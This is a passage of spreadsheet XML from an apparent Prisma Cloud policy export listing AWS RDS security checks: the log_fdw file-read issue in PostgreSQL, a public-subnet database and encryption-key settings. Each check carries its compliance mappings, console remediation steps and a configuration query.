      <c r="P2051" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2051" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2051" t="inlineStr">
        <is>
          <t>ISM-1246</t>
        </is>
      </c>
      <c r="S2051" t="inlineStr"/>
      <c r="T2051" t="b">
        <v>0</v>
      </c>
      <c r="U2051" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2051" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2051" t="inlineStr">
        <is>
          <t>This policy identifies AWS Aurora PostgreSQL which are exposed to local file read vulnerability. AWS Aurora PostgreSQL installed with vulnerable 'log_fdw' extension is exposed to local file read vulnerability, due to which attacker could gain access to local system files of the database instance within their account, including a file which contained credentials specific to Aurora PostgreSQL. It is highly recommended to upgrade AWS Aurora PostgreSQL to the latest version.
For more information,
https://aws.amazon.com/security/security-bulletins/AWS-2022-004/</t>
        </is>
      </c>
      <c r="X2051" t="inlineStr">
        <is>
          <t>Amazon has deprecated affected versions of Aurora PostgreSQL and customers can no longer create new instances with the affected versions.
To upgrade the latest version of Amazon Aurora PostgreSQL, please follow below URL:
https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_UpgradeDBInstance.PostgreSQL.html</t>
        </is>
      </c>
      <c r="Y2051" t="inlineStr"/>
      <c r="Z2051" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and engine equals aurora-postgresql and engineVersion is member of ('10.11','10.12','10.13','11.6','11.7','11.8')</t>
        </is>
      </c>
      <c r="AA2051" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2051" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2051" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-875</t>
        </is>
      </c>
      <c r="AD2051" t="b">
        <v>1</v>
      </c>
      <c r="AE2051" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2051" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>c69f2020-a640-4df1-91fc-f1a14e480cb8</t>
        </is>
      </c>
      <c r="AI2051" t="inlineStr">
        <is>
          <t>a7588e59-6da5-4cfa-9476-62f707d36a9a</t>
        </is>
      </c>
      <c r="AJ2051" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2051" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CIS Controls v8, CIS Controls v8.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, NIST SP 800-171 Revision 3, CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, Microsoft Cloud Security Benchmark v1, MLPS 2.0 (Level 2), TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, TX-RAMP Level 1, CRI Profile v2.0, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2052" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2052" s="2" t="inlineStr"/>
      <c r="D2052" t="inlineStr"/>
      <c r="E2052" t="inlineStr"/>
      <c r="F2052" t="inlineStr"/>
      <c r="G2052" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2052" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2052" t="inlineStr">
        <is>
          <t>AWS RDS PostgreSQL exposed to local file read vulnerability</t>
        </is>
      </c>
      <c r="L2052" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2052" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2052" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2052" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2052" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2052" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2052" t="inlineStr">
        <is>
          <t>ISM-1246</t>
        </is>
      </c>
      <c r="S2052" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2052" t="b">
        <v>0</v>
      </c>
      <c r="U2052" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2052" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2052" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS PostgreSQL which are exposed to local file read vulnerability. AWS RDS PostgreSQL installed with vulnerable 'log_fdw' extension is exposed to local file read vulnerability, due to which attacker could gain access to local system files of the database instance within their account, including a file which contained credentials specific to PostgreSQL. It is highly recommended to upgrade AWS RDS PostgreSQL to the latest version.
For more information,
https://aws.amazon.com/security/security-bulletins/AWS-2022-004/</t>
        </is>
      </c>
      <c r="X2052" t="inlineStr">
        <is>
          <t>Amazon has deprecated affected versions of RDS for PostgreSQL and customers can no longer create new instances with the affected versions.
To upgrade the latest version of Amazon RDS for PostgreSQL, please follow below URL:
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_UpgradeDBInstance.PostgreSQL.html
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension</t>
        </is>
      </c>
      <c r="Y2052" t="inlineStr"/>
      <c r="Z2052" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and engine equals postgres and engineVersion is member of ('13.2','13.1','12.6','12.5','12.4','12.3','12.2','11.11','11.10','11.9','11.8','11.7','11.6','11.5','11.4','11.3','11.2','11.1','10.16','10.15','10.14','10.13','10.12','10.11','10.10','10.9','10.7','10.6','10.5','10.4','10.3','10.1','9.6.21','9.6.20','9.6.19','9.6.18','9.6.17','9.6.16','9.6.15','9.6.14','9.6.12','9.6.11','9.6.10','9.6.9','9.6.8','9.6.6','9.6.5','9.6.3','9.6.2','9.6.1','9.5','9.4','9.3')
{"category":"General","resourceTypes":["aws_rds_cluster", "aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA2052" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2052" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2052" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-874-CKV_AWS_250</t>
        </is>
      </c>
      <c r="AD2052" t="b">
        <v>1</v>
      </c>
      <c r="AE2052" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2052" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>afa1ed5a-f39d-457a-952d-be3ab101e077</t>
        </is>
      </c>
      <c r="AI2052" t="inlineStr">
        <is>
          <t>90d41de0-e234-481f-8f62-6215c87cbd01</t>
        </is>
      </c>
      <c r="AJ2052" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2052" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), CIS Controls v8, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MLPS 2.0, NIST CSF, APRA (CPS 234) Information Security, ISO 27002:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-171 Revision 2, CIS Controls v7.1, APRA (CPS 234) Information Security, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, ISO/IEC 27001:2022, ISO/IEC 27002:2013, PCI DSS v4.0, CDC NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27017:2015, Matt's ATT&amp;ACK, CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, ISO/IEC 27002:2013, CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), ISO 27002:2022, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27018:2019, NIST CSF, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, MLPS 2.0 (Level 3), Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-172, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, MAS TRM 2021, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Copy of CIS Controls v8, DORA, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.9.6.0, CyberSecurity Law of the People's Republic of China, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2053" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2053" s="2" t="inlineStr"/>
      <c r="D2053" t="inlineStr"/>
      <c r="E2053" t="inlineStr"/>
      <c r="F2053" t="inlineStr"/>
      <c r="G2053" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2053" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2053" t="inlineStr">
        <is>
          <t>AWS RDS instance not in private subnet</t>
        </is>
      </c>
      <c r="L2053" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2053" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2053" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2053" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2053" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2053" t="inlineStr">
        <is>
          <t>Control Category: 06.0</t>
        </is>
      </c>
      <c r="R2053" t="inlineStr">
        <is>
          <t>06.h</t>
        </is>
      </c>
      <c r="S2053" t="inlineStr"/>
      <c r="T2053" t="b">
        <v>0</v>
      </c>
      <c r="U2053" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2053" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2053" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS instance which are not in a private subnet. RDS should not be deployed in a public subnet, production databases should be located behind a DMZ in a private subnet with limited access in most scenarios.</t>
        </is>
      </c>
      <c r="X2053" t="inlineStr">
        <is>
          <t>To resolve this alert, you should redeploy RDS into a private RDS Subnet group.
Note: You can not move an existing RDS instance from one subnet to another.
Create a RDS Subnet group:
A DB subnet group is a collection of subnets (typically private) that you create for a VPC and that you then designate for your DB instances.
1. Open the Amazon RDS console
2. In the navigation pane, choose 'Subnet groups'
3. Choose 'Create DB Subnet Group'
4. Type the 'Name' of your DB subnet group
5. Add a 'Description' for your DB subnet group
6. Choose your 'VPC'
7. Choose 'Availability Zones'
8. In the Add subnets section, add your Private subnets related to this VPC
9. Choose Create
When creating your RDS DB, under Configure advanced settings, choose the Subnet group created above.</t>
        </is>
      </c>
      <c r="Y2053" t="inlineStr"/>
      <c r="Z2053" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-describe-db-instances' as X; config from cloud.resource where api.name = 'aws-ec2-describe-route-tables' AND json.rule = associations[*].subnetId exists and routes[?any( state equals active and gatewayId starts with igw- and (destinationCidrBlock equals "0.0.0.0/0" or destinationIpv6CidrBlock equals "::/0"))] exists as Y; filter '$.X.dbsubnetGroup.subnets[*].subnetIdentifier intersects $.Y.associations[*].subnetId'; show X;</t>
        </is>
      </c>
      <c r="AA2053" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2053" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2053" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-330</t>
        </is>
      </c>
      <c r="AD2053" t="b">
        <v>1</v>
      </c>
      <c r="AE2053" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2053" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>7c41236b-3812-4065-bc2b-57d831fbb876</t>
        </is>
      </c>
      <c r="AI2053" t="inlineStr">
        <is>
          <t>1f2887c9-cc4a-48f3-b8aa-a69bdfb9e19d</t>
        </is>
      </c>
      <c r="AJ2053" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2053" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, Fedramp (Moderate), ISO/IEC 27002:2013, CIS v1.4.0 (AWS), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev4, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, MLPS 2.0, NIST 800-53 Rev4, ISO/IEC 27018:2019, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CIS v1.5.0 (AWS) - Level 1, PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, wells fargo CIS v1.5.0 (AWS) - Level 1, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2054" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2054" s="2" t="inlineStr"/>
      <c r="D2054" t="inlineStr"/>
      <c r="E2054" t="inlineStr"/>
      <c r="F2054" t="inlineStr"/>
      <c r="G2054" t="b">
        <v>0</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2054" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2054" t="inlineStr">
        <is>
          <t>AWS RDS database not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L2054" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2054" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2054" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2054" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2054" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2054" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2054" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2054" t="inlineStr"/>
      <c r="T2054" t="b">
        <v>0</v>
      </c>
      <c r="U2054" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2054" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2054" t="inlineStr">
        <is>
          <t>This policy identifies RDS databases that are encrypted with default KMS keys and not with customer managed keys. As a best practice, use customer managed keys to encrypt the data on your RDS databases and maintain control of your keys and data on sensitive workloads.</t>
        </is>
      </c>
      <c r="X2054" t="inlineStr">
        <is>
          <t>Because you can set AWS RDS database encryption only during database creation, the process for resolving this alert requires you to create a new RDS database with a customer managed key for encryption, migrate the data from the reported database to this newly created database, and delete the RDS database identified in the alert.
To create a new RDS database with encryption using a customer managed key:
1. Log in to the AWS console.
2. Select the region for which the alert was generated.
3. Navigate to the Amazon RDS Dashboard.
4. Select 'Create database'.
5. On the 'Select engine' page, select 'Engine options' and 'Next'.
6. On the 'Choose use case' page, select 'Use case' of database and 'Next'.
7. On the 'Specify DB details' page, specify the database details you need and click 'Next'.
Note: Amazon RDS encryption has some limitation on region and type instances. For Availability of Amazon RDS Encryption refer to: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html#Overview.Encryption.Availability
8. On the 'Configure advanced settings' page, Under 'Encryption', select 'Enable encryption' and select the customer managed key [i.e. Other than (default)aws/rds] from 'Master key' dropdown list].
9. Select 'Create database'.
To delete the RDS database that uses the default KMS keys, which triggered the alert:
1. Log in to the AWS console
2. Select the region for which the alert was generated.
3. Navigate to the Amazon RDS Dashboard.
4. Click on Instances, and select the reported RDS database.
5. Select the 'Instance actions' drop-down and click 'Delete'.
7. In the 'Delete' dialog, select the 'Create final snapshot?' checkbox, if you want a backup. Provide a name for the final snapshot, confirm deletion and select 'Delete'.</t>
        </is>
      </c>
      <c r="Y2054" t="inlineStr"/>
      <c r="Z2054" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-describe-db-instances' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '$.X.storageEncrypted is true and $.X.kmsKeyId equals $.Y.key.keyArn and $.Y.keyMetadata.keyManager contains AWS'; show X;</t>
        </is>
      </c>
      <c r="AA2054" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2054" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2054" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-310</t>
        </is>
      </c>
      <c r="AD2054" t="b">
        <v>1</v>
      </c>
      <c r="AE2054" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2054" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>bddaae74-c3ad-474d-858f-982fecac5f1b</t>
        </is>
      </c>
      <c r="AI2054" t="inlineStr">
        <is>
          <t>11633a39-8c89-4a18-92e8-94f507b3e33c</t>
        </is>
      </c>
      <c r="AJ2054" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2054" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, DORA, Telecommunications Security Act - TSA, TX-RAMP Level 1, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2055" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2055" s="2" t="inlineStr"/>
      <c r="D2055" t="inlineStr"/>
      <c r="E2055" t="inlineStr"/>
      <c r="F2055" t="inlineStr"/>
      <c r="G2055" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2055" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2055" t="inlineStr">
        <is>
          <t>AWS RDS database instance encrypted with Customer Managed Key (CMK) is not enabled for regular rotation</t>
        </is>
      </c>
      <c r="L2055" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2055" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2055" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2055" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2055" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2055" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2055" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2055" t="inlineStr"/>
      <c r="T2055" t="b">
        <v>0</v>
      </c>
      <c r="U2055" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2055" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2055" t="inlineStr">
        <is>
          <t>This policy identifies Amazon RDS instances that use Customer Managed Keys (CMKs) for encryption but are not enabled with key rotation. Amazon RDS instance encryption key rotation failure can result in prolonged exposure of sensitive data and potential compliance violations. As a security best practice, it is important to periodically rotate these keys. This ensures that if the keys are compromised, the data in the underlying service remains secure with the new keys.</t>
        </is>
      </c>
      <c r="X2055" t="inlineStr">
        <is>
          <t>The following steps are recommended to enable the automatic rotation of the KMS key used by the RDS instance
1. Log in to the AWS console.
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated.
4. Navigate to the 'RDS' service.
5. Select the RDS instance reported in the alert, and click on the 'Configuration' tab.
6. Under the 'Storage' section, click on the KMS key link in 'AWS KMS key'.
7. Under the 'Key rotation' tab on the navigated KMS key window, enable the 'Automatically rotate this CMK every year' check box.
8. Click on Save.</t>
        </is>
      </c>
      <c r="Y2055" t="inlineStr"/>
      <c r="Z2055" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-describe-db-instances' and json.rule = storageEncrypted is true as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and keyMetadata.keyManager equals CUSTOMER and keyMetadata.origin equals AWS_KMS and (rotation_status.keyRotationEnabled is false or rotation_status.keyRotationEnabled equals "null") as Y; filter '($.X.kmsKeyId equals $.Y.key.keyArn)'; show X;</t>
        </is>
      </c>
      <c r="AA2055" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2055" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2055" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-1078</t>
        </is>
      </c>
      <c r="AD2055" t="b">
        <v>1</v>
      </c>
      <c r="AE2055" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2055" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>e7b667cb-53e1-4046-b52c-505b4093ad3f</t>
        </is>
      </c>
      <c r="AI2055" t="inlineStr">
        <is>
          <t>de4ec1cf-39ee-41fd-8dc5-e2ed80f45c50</t>
        </is>
      </c>
      <c r="AJ2055" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2055" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" t="inlineStr">
        <is>
